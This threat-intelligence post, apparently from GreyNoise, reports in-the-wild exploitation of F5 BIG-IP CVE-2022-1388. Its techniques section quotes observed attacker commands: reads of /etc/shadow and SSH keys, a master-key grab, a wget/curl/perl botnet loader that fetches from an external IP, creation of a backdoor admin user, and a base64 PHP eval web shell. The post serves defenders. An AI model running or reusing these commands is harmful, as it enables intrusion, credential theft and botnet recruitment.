Observed in the Wild: F5 BIG-IP CVE-2022-1388

TL;DR 

• As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability in the wild.
• GreyNoise Trends exploit activity observed in the wild for CVE-2022-1388
• Observed exploit techniques include a large number of file requests, credential stuffing, and admin user creation. 
• Download the latest list of IPs trying to exploit this vulnerability here for use in analysis and temporary blocking

Vulnerability Overview - CVE-2022-1388

On 4-May-22, F5 Networks issued Security Advisory K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388, which allows an unauthenticated attacker to take control of an affected system. According to NIST’s National Vulnerability Database, CVE-2022-1388 carries a CVSS score of 9.8 CRITICAL out of 10.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services," F5 said in an advisory. "There is no data plane exposure; this is a control plane issue only."

The F5 Security Advisory identifies which versions are affected, and the company has issued patches for the flaw, as well as recommended temporary workarounds until the fixes can be applied. 

As of May 8, 2022, a number of security researchers started sharing evidence of their successful exploitation attempts:

• https://twitter.com/BursaMatus/status/1523379163914137600
• https://twitter.com/ptswarm/status/1522873828896034816
• https://twitter.com/Horizon3Attack/status/1523634533400461312

Given the severity of the vulnerability and ease of exploitation, GreyNoise advises organizations to apply mitigations or patch immediately.

Observed In The Wild

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass:

• https://viz.greynoise.io/tag/f5-big-ip-icontrol-rest-authentication-bypass

As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability, CVE-2022-1388. 

‍

Below are a set of observations from the GreyNoise Research team based on the mass exploitation activity for this CVE that we’ve captured via our passive global sensor network:

Scale of attacks

Although GreyNoise has seen a rising number of IP addresses using this attack, this is still a relatively low number when compared to the first week of the Apache Log4J Vulnerability CVE-2021-44228, which had up to 800 unique IPs in the first days of public proof of concept release. This is potentially because of the large number of devices with “F5 BigIP'' in their title on Shodan and the large percentage of those that could be honeypots. Some honeypots lack crucial characteristics that this attack relies on, such as a server associated with the vulnerability like Apache or Jetty, and therefore are worthless to the attacker. 

Source of attacks

• 30% of exploit traffic targeting F5 BigIP devices is coming through TOR, commonly used for source obfuscation.
• 52 out of 123 of the IPs in the initial survey of traffic were new IPs to GreyNoise sensors. This indicates actors may have utilized new infrastructure to deploy their exploit scripts.

Exploitation techniques

A large number of file requests - using ‘cat’ and then a filename allows the attacker to read the files they are requesting. They can use this information as reconnaissance for further attacks.

<pre><code>cat /root/.bash_history
cat /etc/hosts
cat /config/bigip.conf
cat /var/ssh/root/identity
cat /config/bigip_user.conf
cat /var/ssh/root/authorized_keys
cat /etc/shadow
cat /var/ssh/root/identity.pub</code></pre>

‍

A single f5 master key grab attempt (Source: https://support.f5.com/csp/article/K9420)

<pre><code>f5mku -K</code></pre>

‍

“Add to botnet” script - a small script starts by using ‘<span class="code-block" fs-test-element="rich-text">unset histfile</span>’ commands to stop the command history from being saved to the box. The script then reaches out to an external IP to get a file called “<span class="code-block" fs-test-element="rich-text">sitemap1.jpg</span>”, and then rules that file as a perl script. That perl script adds the machine to an IRC-based botnet.

<pre><code>unset HISTFILE;unset HISTSAVE;wget http://[x.x.x.x]/sitemap1.jpg;fetch http://[x.x.x.x]/sitemap1.jpg;curl -O http://[x.x.x.x]/sitemap1.jpg;perl sitemap1.jpg;rm -rf sitemap*\</code></pre>

‍

‍Credential stuffing - we’ve seen an interesting approach to credential stuffing used - a base64 encoded login string which decodes to admin:horizon 3. @Horizon3Attack is the name of the group which first released their PoC for this exploit.

• Connection: X-F5-Auth-Token Host: 127.0.0.1 Authorization: Basic YWRtaW46aG9yaXpvbjM= X-F5-Auth-Token: asdf 

Exploit failures - we’re seeing some things that just don’t work. 

• X-F5-Auth-Tokens set to values that won’t work - the most prominent of which taking the literal advice of “set the X-F5-Auth-Token to anything”.

User creation - the user created results in an admin role with a bash shell, giving the attacker potential command line access if the command actually creates the user.

<pre><code>tmsh show running-config /auth user; tmsh create auth user syscron password MfWmK86skPwXiTG partition-access add { all-partitions { role admin } } shell bash'</code></pre>

‍

‍Potential php eval script injection - a small script that edits the imgTui.php script internal to the F5. This technique is a potential php eval script injection. 

<pre><code>mount -o remount -rw /usr;echo PD9waHAgQGV2YWwoJF9SRVFVRVNUWydUN01IeXJkM0w2J10pOw== | base64 --decode > /usr/local/www/xui/common/images/imgTui.php;mount -o remount -r /usr</code></pre>

• The base64 decodes to <?php @eval($_REQUEST['T7MHyrd3L6']);

Indicators of Compromise

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass provides a downloadable list of all the IP addresses observed attempting to mass exploit CVE-2022-1388 in the past 24 hours.

Mitigation Actions

Patch

‍F5 has recommended installing patched versions of F5 BIG-IP that are known to be vulnerable.

Mitigation prior to patching

‍Until you can install the patched version of BIG-IP, there are several temporary mitigations you can apply:

• Block iControl REST access - F5-recommended mitigations include blocking iControl REST access through the self IP address and the management interface
• Modify BIG=IP httpd configuration - F5-recommended mitigation
• Block mass exploit IP addresses - GreyNoise identifies a list of IP addresses attempting to exploit this BIG-IP vulnerability in the past 24 hours that you can block temporarily until you have had time to install the patched version of BIG-IP. The IP addresses can be downloaded from GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass in several formats, including JSON, CSV, TXT files, as well as dynamically updated URLs for use with Palo Alto Networks, Cisco, and Fortinet firewalls.

Additional Information

• 4-May-22 F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability, The Hacker News
• 8-May-22 Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability, The Hacker News
• 10-May-22 Critical F5 BIG-IP vulnerability exploited to wipe devices, Bleeping Computer
• 12-May-22 Active Exploitation of F5 BIG-IP Devices (CVE-2022-1388), Security Boulevard